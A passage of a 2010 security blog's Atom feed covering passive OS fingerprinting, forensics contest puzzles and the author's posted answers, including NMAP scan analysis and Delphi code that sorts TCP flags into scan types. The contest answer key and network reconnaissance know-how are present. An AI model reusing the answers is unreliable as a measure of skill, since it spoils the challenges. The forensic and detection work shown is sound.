products on his page that I haven't mentioned.  Anyway, thanks for the recent updates/fixes.  If you are utilizing any of the .xml files I provide I highly recommend using this to edit them!&lt;br /&gt;&lt;br /&gt;Also, I've updated 3 or 4 of the main .xml files multiple times in the past week after not having updated them in quite some time.  So make sure you check for new updates of the .xml files.  There may be some new ones that haven't made it into the latest Fingerprint Editor program.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-1963533445155880015?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://pagesperso-orange.fr/cycocrew/delphi/FingerprintEditorSetup.exe' title='Fingerprint Editor updated'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/1963533445155880015/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=1963533445155880015' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1963533445155880015'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1963533445155880015'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/05/fingerprint-editor-updated.html' title='Fingerprint Editor updated'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3695561821465697159</id><published>2010-04-10T21:21:00.002-06:00</published><updated>2010-04-10T21:25:57.990-06:00</updated><title type='text'>Contest #5</title><content type='html'>This one has nothing to do with os fingerprinting, passive or active, it is malware based.  Being that that is the case I almost didn't post anything here about it, but I know I have some people following the blog in a "hidden" manner, so for those that are and are interested, there is a malware forensic challenge out there for you!&lt;br /&gt;&lt;br /&gt;The puzzle:&lt;br /&gt;&lt;br /&gt;It was a morning ritual. Ms. Moneymany sipped her coffee as she quickly went through the email that arrived during the night. One of the messages caught her eye, because it was clearly spam that somehow got past the email filter. The message extolled the virtues of buying medicine on the web and contained a link to the on-line pharmacy. “Do people really fall for this stuff?” Ms. Moneymany thought. She was curious to know how the website would convince its visitors to make the purchase, so she clicked on the link.&lt;br /&gt;&lt;br /&gt;The website was slow to load, and seemed to be broken. There was no content on the page. Disappointed, Ms. Moneymany closed the browser’s window and continued with her day.&lt;br /&gt;&lt;br /&gt;She didn’t realize that her Windows XP computer just got infected.&lt;br /&gt;&lt;br /&gt;You are the forensic investigator. You possess the network capture (PCAP) file that recorded Ms. Moneymany’s interactions with the website. Your mission is to understand what probably happened to Ms. Moneymany’s system after she clicked the link. Your analysis will start with the PCAP file and will reveal a malicious executable.&lt;br /&gt;&lt;br /&gt;Answer the following questions:&lt;br /&gt;&lt;br /&gt;1. 
As part of the infection process, Ms. Moneymany’s browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets?&lt;br /&gt;2. What was Ms. Moneymany’s username on the infected Windows system?&lt;br /&gt;3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click?&lt;br /&gt;4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? Hint: It ends on “91ed”.&lt;br /&gt;5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in “mainstream” malware.&lt;br /&gt;6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?&lt;br /&gt;7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?&lt;br /&gt;&lt;br /&gt;Prize: Lenovo Ideapad S10-2 netbook &lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;I've taken a look at it and may have to try to spend some time working on it.  If nothing else just as a new puzzle to figure out.  
I won't be writing any code for it, but may use it as a chance to understand java more and how this malware got on the machine and ran.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3695561821465697159?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://forensicscontest.com/2010/04/01/ms-moneymanys-mysterious-malware' title='Contest #5'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3695561821465697159/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3695561821465697159' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3695561821465697159'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3695561821465697159'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/04/contest-5.html' title='Contest #5'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8840791445711080666</id><published>2010-04-02T09:22:00.002-06:00</published><updated>2010-04-02T09:33:54.990-06:00</updated><title type='text'>Forensics contest #4 Results</title><content type='html'>Made the finalist list!&lt;br /&gt;&lt;br /&gt;They've released contest #5, I'll post more on it later today or this weekend.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 
src='https://blogger.googleusercontent.com/tracker/5343200444918965958-8840791445711080666?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://forensicscontest.com/2010/04/01/puzzle-4-winners' title='Forensics contest #4 Results'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8840791445711080666/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8840791445711080666' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8840791445711080666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8840791445711080666'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/04/forensics-contest-4-results.html' title='Forensics contest #4 Results'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4886479554785110915</id><published>2010-03-19T09:39:00.003-06:00</published><updated>2010-03-19T09:47:31.039-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forensics contest'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><title type='text'>Forensics contest #4 Answer</title><content type='html'>Ok, 3/18/10 has come and gone so I figure it is ok to post my answer at this point in time.  Not sure if I got it correct or not, but here goes.  
I actually made some changes to Satori and wrote a new .exe specifically for parsing the data; you can find more in the writeup:&lt;br /&gt;&lt;br /&gt;Answer 1: 10.42.42.253&lt;br /&gt;Answer 2: TCP CONNECT&lt;br /&gt;Answer 3a: 10.42.42.50&lt;br /&gt;Answer 3b: 10.42.42.56&lt;br /&gt;Answer 3c: 10.42.42.25&lt;br /&gt;Answer 4: 00:16:CB:92:6E:DC&lt;br /&gt;Answer 5: 10.42.42.50&lt;br /&gt;Answer 6: 135&lt;br /&gt;Answer 6: 139&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Xtra-Credit:&lt;br /&gt;NMAP, we can tell this by some of the unique things it does on Syn Scans, also some of the MSS sizes it sends in its OS fingerprinting tests and its ICMP code of 9 in that test.&lt;br /&gt;&lt;br /&gt;While not exactly like NMAP puts out and without the OS guesses:&lt;br /&gt;&lt;br /&gt;---------------------------------------&lt;br /&gt;Summary&lt;br /&gt;---------------------------------------&lt;br /&gt;List of Possible NMAP Scanning machines (and number of ports scanned):&lt;br /&gt;      10.42.42.25=12&lt;br /&gt;      10.42.42.253=7420&lt;br /&gt;&lt;br /&gt;List of Possible Machines Scanned by NMAP System (and number of ports scanned):&lt;br /&gt;      10.42.42.25=3401&lt;br /&gt;      10.42.42.50=2025&lt;br /&gt;      10.42.42.56=2005&lt;br /&gt;&lt;br /&gt;Systems with Open Ports:&lt;br /&gt;      10.42.42.50 - 135/tcp&lt;br /&gt;      10.42.42.50 - 139/tcp&lt;br /&gt;&lt;br /&gt;Systems with Unfiltered Ports:&lt;br /&gt;      10.42.42.25 - 1/tcp&lt;br /&gt;      10.42.42.253 - 36020/tcp&lt;br /&gt;      10.42.42.253 - 36119/tcp&lt;br /&gt;      10.42.42.253 - 36120/tcp&lt;br /&gt;      10.42.42.253 - 36121/tcp&lt;br /&gt;      10.42.42.253 - 36122/tcp&lt;br /&gt;      10.42.42.253 - 36123/tcp&lt;br /&gt;      10.42.42.253 - 36124/tcp&lt;br /&gt;      10.42.42.253 - 36131/tcp&lt;br /&gt;      10.42.42.253 - 36134/tcp&lt;br /&gt;      10.42.42.50 - 1/tcp&lt;br /&gt;      10.42.42.50 - 135/tcp&lt;br /&gt;      10.42.42.56 - 1/tcp&lt;br /&gt;&lt;br /&gt;Systems with Closed 
Ports:&lt;br /&gt;      10.42.42.25=2003 Port(s) not Shown&lt;br /&gt;      10.42.42.253=2 Port(s) not Shown&lt;br /&gt;      10.42.42.50=2000 Port(s) not Shown&lt;br /&gt;      10.42.42.56=2005 Port(s) not Shown&lt;br /&gt;&lt;br /&gt;Description:&lt;br /&gt;Running the packet capture through nfc (http://myweb.cableone.net/xnih/download/nfc.zip), we find out there are 2 possible systems doing some type of scan:&lt;br /&gt;&lt;br /&gt;10.42.42.25 and 10.42.42.253.  Looking at the sheer number of scan packets, we can tell that 10.42.42.253 is the main system doing any type of scan.  We can also look at SYN, Connect, XMAS and NULL scan types and see that 10.42.42.253 shows up in all 4, where 10.42.42.25 only shows up in the Connect Scan.&lt;br /&gt;&lt;br /&gt;While 10.42.42.253 does do SYN, Connect, XMAS, NULL, and at least 1 port on UDP (probably during the OS fingerprinting part when looking for a closed UDP port), the first scan he does is a TCP Connect Scan.  We can see this by the flags and more importantly by the tcpoptions that are used.  
The general way we can break down the scan types is as follows (chunk of the Delphi code used; due to having to port all the C code over to Pascal on my own, source is not available, but general info on what was done is provided in the downloaded nfc zip file):&lt;br /&gt;&lt;br /&gt;    if tcpflags = 'SA' then  // SYN/ACK reply: the port is open&lt;br /&gt;      OpenPorts.Add(sl.Strings[x])&lt;br /&gt;    else if tcpflags = 'RA' then  // RST/ACK reply: the port is closed&lt;br /&gt;      ClosedPorts.Add(sl.Strings[x])&lt;br /&gt;    else if tcpflags = 'R' then  // bare RST: reported as unfiltered&lt;br /&gt;      UnfilteredPorts.Add(sl.Strings[x])&lt;br /&gt;    else if (tcpflags = 'A') and (tcpoptions = '') then  // ACK with no options: ACK scan probe&lt;br /&gt;      ACKScan.Add(sl.Strings[x])&lt;br /&gt;    else if tcpflags = '' then  // no flags at all: NULL scan probe&lt;br /&gt;      NullScan.Add(sl.Strings[x])&lt;br /&gt;    else if tcpflags = 'FPU' then  // FIN/PSH/URG: XMAS scan probe&lt;br /&gt;      XMASScan.Add(sl.Strings[x])&lt;br /&gt;    else if tcpflags = 'S' then&lt;br /&gt;      begin&lt;br /&gt;        if tcpoptions = 'M1460:.' then  // SYN carrying only the fixed MSS 1460 option: raw SYN scan probe&lt;br /&gt;          SynScan.Add(sl.Strings[x])&lt;br /&gt;        else //tcpoptions are going to be OS specific, so doing catch all for now&lt;br /&gt;          ConnectScan.Add(sl.Strings[x]);&lt;br /&gt;      end;&lt;br /&gt;&lt;br /&gt;The tcpoptions are the same data I use in Satori for passively identifying OS's.  
This is close to what p0f is doing and the general fingerprints are the same, though mine have been updated over the past few years.&lt;br /&gt;&lt;br /&gt;Looking through the summary info of NFC we can see that 3 machines were scanned:&lt;br /&gt;10.42.42.25&lt;br /&gt;10.42.42.50&lt;br /&gt;10.42.42.56&lt;br /&gt;&lt;br /&gt;Each saw a different number of ports scanned; this could be due to how NMAP's scripting engine works when it tries to OS fingerprint the remote system, though some of it could also be because of the interaction between these 3 hosts when they started up their own conversations.&lt;br /&gt;&lt;br /&gt;For OS identification we now look at Satori (http://myweb.cableone.net/xnih/download/satori.zip).&lt;br /&gt;&lt;br /&gt;For this exercise some tweaks were made to a few of the fingerprinting dlls.  While Satori wasn't designed to specifically parse nmap traffic, it can, though it is a bit slow due to the number of packets with tcpoptions.&lt;br /&gt;&lt;br /&gt;One of the dlls that was changed was the icmp one, found under the pull down for "icmp".  NMAP sends ICMP Type 8 packets with an ICMP Code of 9 (Languard sends with a 13, others may send with their own too, trying to elicit a different response with a valid and invalid code).  For the TCP dll I modified it to identify more than just S and SA packets (where the original dll just dropped all the others); we now process them and tag them, even ones that may be of no use, such as those with flags FA and PA.  The main new useful ones were NULL and XMAS.  I also updated the mtu text file under fingerprinting to add in the common MTU sizes that NMAP uses (305, 680, 1440).  
All of this can be found in the pull down for "tcp".&lt;br /&gt;&lt;br /&gt;Note:  The downloadable version of Satori is quite old, but the updater program should be run after initial download, selecting ALL files, not just ones it marks as new, since it looks at the last modified date, which typically is when you extracted the file.&lt;br /&gt;&lt;br /&gt;Anyway, to determine each OS here we can look at the data that Satori provided:&lt;br /&gt;10.42.42.253 - Linux 2.6 (p0f) or Solaris (ettercap), nothing in my DB to identify it&lt;br /&gt;10.42.42.50 - Windows XP SP3 most likely, XP or 2000 (Satori), Windows 2000 (p0f), BSD or 2000 Server (ettercap)&lt;br /&gt;10.42.42.56 - unknown across all passive fingerprinting&lt;br /&gt;10.42.42.25 - unknown across all passive fingerprinting, but based on the MAC, and that alone, Apple (could always be spoofed); if it is an OS X box, there is a Syn fingerprint that can be added to my DB.&lt;br /&gt;&lt;br /&gt;Based on the MAC, the Apple machine's MAC is:  00:16:CB:92:6E:DC&lt;br /&gt;&lt;br /&gt;The Windows machine's IP can be seen above.&lt;br /&gt;&lt;br /&gt;Using either NFC or Satori we can see that TCP ports 135 and 139 were open on it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NFC output:&lt;br /&gt;---------------------------------------&lt;br /&gt;Types of Scans and General Info&lt;br /&gt;---------------------------------------&lt;br /&gt;SYN Scan info:&lt;br /&gt;      Start Time: 2010-02-02 17:43:10 Packet #: 6728&lt;br /&gt;      End Time: 2010-02-02 17:44:03 Packet #: 13525&lt;br /&gt;      System(s) appearing to do SYN Scans:&lt;br /&gt;              10.42.42.253=3745&lt;br /&gt;      System(s) appearing to be SYN Scanned:&lt;br /&gt;              10.42.42.25=1745&lt;br /&gt;              10.42.42.56=1000&lt;br /&gt;              10.42.42.50=1000&lt;br /&gt;&lt;br /&gt;Connect Scan info:&lt;br /&gt;      Start Time: 2010-02-02 17:34:06 Packet #: 1&lt;br /&gt;      End Time: 2010-02-02 17:44:12 Packet #: 13620&lt;br /&gt;      
System(s) appearing to do Connect Scans:&lt;br /&gt;              10.42.42.253=3670&lt;br /&gt;              10.42.42.25=12&lt;br /&gt;      System(s) appearing to be Connect Scanned:&lt;br /&gt;              10.42.42.50=1024&lt;br /&gt;              10.42.42.56=1003&lt;br /&gt;              10.42.42.25=1655&lt;br /&gt;&lt;br /&gt;XMAS Scan info:&lt;br /&gt;      Start Time: 2010-02-02 17:44:10 Packet #: 13599&lt;br /&gt;      End Time: 2010-02-02 17:44:13 Packet #: 13624&lt;br /&gt;      System(s) appearing to do XMAS Scans:&lt;br /&gt;              10.42.42.253=4&lt;br /&gt;      System(s) appearing to be XMAS Scanned:&lt;br /&gt;              10.42.42.56=2&lt;br /&gt;              10.42.42.25=1&lt;br /&gt;              10.42.42.50=1&lt;br /&gt;&lt;br /&gt;NULL Scan info:&lt;br /&gt;      Start Time: 2010-02-02 17:44:10 Packet #: 13597&lt;br /&gt;      End Time: 2010-02-02 17:44:10 Packet #: 13597&lt;br /&gt;      System(s) appearing to do NULL Scans:&lt;br /&gt;              10.42.42.253=1&lt;br /&gt;      System(s) appearing to be NULL Scanned:&lt;br /&gt;              10.42.42.50=1&lt;br /&gt;&lt;br /&gt;---------------------------------------&lt;br /&gt;Summary&lt;br /&gt;---------------------------------------&lt;br /&gt;List of Possible NMAP Scanning machines (and number of ports scanned):&lt;br /&gt;      10.42.42.25=12&lt;br /&gt;      10.42.42.253=7420&lt;br /&gt;&lt;br /&gt;List of Possible Machines Scanned by NMAP System (and number of ports scanned):&lt;br /&gt;      10.42.42.25=3401&lt;br /&gt;      10.42.42.50=2025&lt;br /&gt;      10.42.42.56=2005&lt;br /&gt;&lt;br /&gt;Systems with Open Ports:&lt;br /&gt;      10.42.42.50 - 135/tcp&lt;br /&gt;      10.42.42.50 - 139/tcp&lt;br /&gt;&lt;br /&gt;Systems with Unfiltered Ports:&lt;br /&gt;      10.42.42.25 - 1/tcp&lt;br /&gt;      10.42.42.253 - 36020/tcp&lt;br /&gt;      10.42.42.253 - 36119/tcp&lt;br /&gt;      10.42.42.253 - 36120/tcp&lt;br /&gt;      10.42.42.253 - 36121/tcp&lt;br /&gt;      
10.42.42.253 - 36122/tcp&lt;br /&gt;      10.42.42.253 - 36123/tcp&lt;br /&gt;      10.42.42.253 - 36124/tcp&lt;br /&gt;      10.42.42.253 - 36131/tcp&lt;br /&gt;      10.42.42.253 - 36134/tcp&lt;br /&gt;      10.42.42.50 - 1/tcp&lt;br /&gt;      10.42.42.50 - 135/tcp&lt;br /&gt;      10.42.42.56 - 1/tcp&lt;br /&gt;&lt;br /&gt;Systems with Closed Ports:&lt;br /&gt;      10.42.42.25=2003 Port(s) not Shown&lt;br /&gt;      10.42.42.253=2 Port(s) not Shown&lt;br /&gt;      10.42.42.50=2000 Port(s) not Shown&lt;br /&gt;      10.42.42.56=2005 Port(s) not Shown&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;No results are perfect here since we are not taking into account where in the scan certain things happen.&lt;br /&gt;&lt;br /&gt;This is just a quick and dirty best guess based on what we are seeing.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Satori, being a GUI program, will have to be downloaded and run.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4886479554785110915?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4886479554785110915/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4886479554785110915' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4886479554785110915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4886479554785110915'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/03/forensics-contest-4-answer.html' title='Forensics contest #4 
Answer'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4903150115269307036</id><published>2010-03-07T15:27:00.002-07:00</published><updated>2010-03-07T15:30:34.474-07:00</updated><title type='text'>Web fingerprinting</title><content type='html'>There was a thread started a while back (on Full Disclosure) and I just figured I'd summarize the apps that they put out there for fingerprinting web sites:&lt;br /&gt;&lt;br /&gt;http://sucuri.net/?page=docs&amp;title=fingerprinting-web-apps&lt;br /&gt;&lt;br /&gt;There is also a live tool for you to test with any site:&lt;br /&gt;http://sucuri.net/?page=docs&amp;title=fingerprinting-web-apps#v6&lt;br /&gt;&lt;br /&gt;--&lt;br /&gt;&lt;br /&gt;http://www.morningstarsecurity.com/research/whatweb&lt;br /&gt;&lt;br /&gt;--&lt;br /&gt;&lt;br /&gt;http://www.mytty.org/wafp/&lt;br /&gt;&lt;br /&gt;--&lt;br /&gt;&lt;br /&gt;I haven't checked any of them out, but wanted to add them here so I could find them if/when I'm looking in the future!  
If you have any others feel free to add them in a reply to this post.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4903150115269307036?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4903150115269307036/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4903150115269307036' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4903150115269307036'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4903150115269307036'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/03/web-fingerprinting.html' title='Web fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4343187618046203796</id><published>2010-02-25T10:25:00.002-07:00</published><updated>2010-02-25T10:29:02.730-07:00</updated><title type='text'>Pass the Hash</title><content type='html'>While I normally post info on here about fingerprinting, I also like looking at anything that "gives away too much info".  I've known about the pass the hash technique for quite a while now, but never paid it much attention until I watched a demo on how effective it can be.&lt;br /&gt;&lt;br /&gt;Anyway, nice paper on how it works, some of the tools to do it and some mitigation options from what I've read so far.  
Need to do more than scan it, but give it a check.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4343187618046203796?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.sans.org/reading_room/whitepapers/testing/passthehash_attacks_tools_and_mitigation_33283' title='Pass the Hash'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4343187618046203796/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4343187618046203796' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4343187618046203796'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4343187618046203796'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/02/pass-hash.html' title='Pass the Hash'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6968138721304688990</id><published>2010-02-17T22:44:00.002-07:00</published><updated>2010-02-17T22:48:48.197-07:00</updated><title type='text'>SSL/TLS Fingerprinting</title><content type='html'>I've been following Thierry Zoller off and on for years now, probably helped that he was one of the first people to find and mention Satori back in the day.&lt;br /&gt;&lt;br /&gt;He's come up with a new tool that fingerprints SSL/TLS connections called SSL/TLS Audit.  
Actually, it is a tool that does SSL/TLS Auditing, just happens to have a feature that in turn fingerprints the ssl engine.&lt;br /&gt;&lt;br /&gt;"Apart from scanning available ciphersuites it has an interesting tidbit : The Fingerprint mode (Experimental). Included is an experimental fingerprint engine that tries to determine the SSL Engine used server side. It does so by sending normal and malformed SSL packets that can be interpreted in different ways.&lt;br /&gt;&lt;br /&gt;SSL Audit is able to fingerprint :&lt;br /&gt;· IIS7.5 (Schannel)&lt;br /&gt;· IIS7.0 (Schannel)&lt;br /&gt;· IIS 6.0 (Schannel)&lt;br /&gt;· Apache (Openssl)&lt;br /&gt;· Apache (NSS)&lt;br /&gt;· Certicom&lt;br /&gt;· RSA BSAFE "&lt;br /&gt;&lt;br /&gt;They have an upcoming paper due out it looks like, so it will be interesting to see what information they provide.  Gives me some ideas, so depending on time in the near future I may have to look into this a bit more.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6968138721304688990?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://blog.zoller.lu/2010/02/ssltls-audit-new-tool.html' title='SSL/TLS Fingerprinting'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6968138721304688990/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6968138721304688990' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6968138721304688990'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6968138721304688990'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2010/02/ssltls-fingerprinting.html' title='SSL/TLS Fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-2280292884355326170</id><published>2010-02-14T16:22:00.002-07:00</published><updated>2010-02-14T16:29:17.950-07:00</updated><title type='text'>Honeynet Challenge #1 Results</title><content type='html'>Well I didn't do as well as I'd hoped on Challenge #1, only got a 25 out of 40 on score, ranking me 28 out of the 91 submissions.  Top third, but not as high as I would have liked.  &lt;br /&gt;&lt;br /&gt;Here were my score results:&lt;br /&gt;   Answer 1: 2 points (of 2)&lt;br /&gt;   Answer 2: 1.5 points (of 2)&lt;br /&gt;   Answer 3: 2 points (of 2)&lt;br /&gt;   Answer 4: 1.5 points (of 2)&lt;br /&gt;   Answer 5: 4 points (of 6)&lt;br /&gt;   Answer 6: 3 points (of 6)&lt;br /&gt;   Answer 7: 2 points (of 2)&lt;br /&gt;   Answer 8: 1 points (of 8)&lt;br /&gt;   Answer 9: 4 points (of 6)&lt;br /&gt;   Answer 10: 2 points (of 2)&lt;br /&gt;   Answer 11: 2 points (of 2)&lt;br /&gt;&lt;br /&gt;Looks like I blew the shell code section along with the general overview!  A bit off here/there other than that too, but those were the worst sections.&lt;br /&gt;&lt;br /&gt;Here were the questions again:&lt;br /&gt;   1. Which systems (i.e. IP addresses) are involved? (2pts)&lt;br /&gt;   2. What can you find out about the attacking host (e.g., where is it located)? (2pts)&lt;br /&gt;   3. How many TCP sessions are contained in the dump file? (2pts)&lt;br /&gt;   4. How long did it take to perform the attack? (2pts)&lt;br /&gt;   5. Which operating system was targeted by the attack? And which service? 
Which vulnerability? (6pts)&lt;br /&gt;   6. Can you sketch an overview of the general actions performed by the attacker? (6pts)&lt;br /&gt;   7. What specific vulnerability was attacked? (2pts)&lt;br /&gt;   8. What actions does the shellcode perform? Pls list the shellcode. (8pts)&lt;br /&gt;   9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)&lt;br /&gt;  10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)&lt;br /&gt;  11. Do you think this is a manual or an automated attack? Why? (2pts)&lt;br /&gt;&lt;br /&gt;Anyway, very fun exercise, glad they put it on and they are posting the results earlier than I thought they would, didn't expect anything until tomorrow.&lt;br /&gt;&lt;br /&gt;Looks like they are planning another one in the near future.  Not sure it is something I'll work on, but keep your eyes on their site if you are interested!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-2280292884355326170?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/2280292884355326170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=2280292884355326170' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2280292884355326170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2280292884355326170'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/02/honeynet-challenge-1-results.html' title='Honeynet Challenge #1 
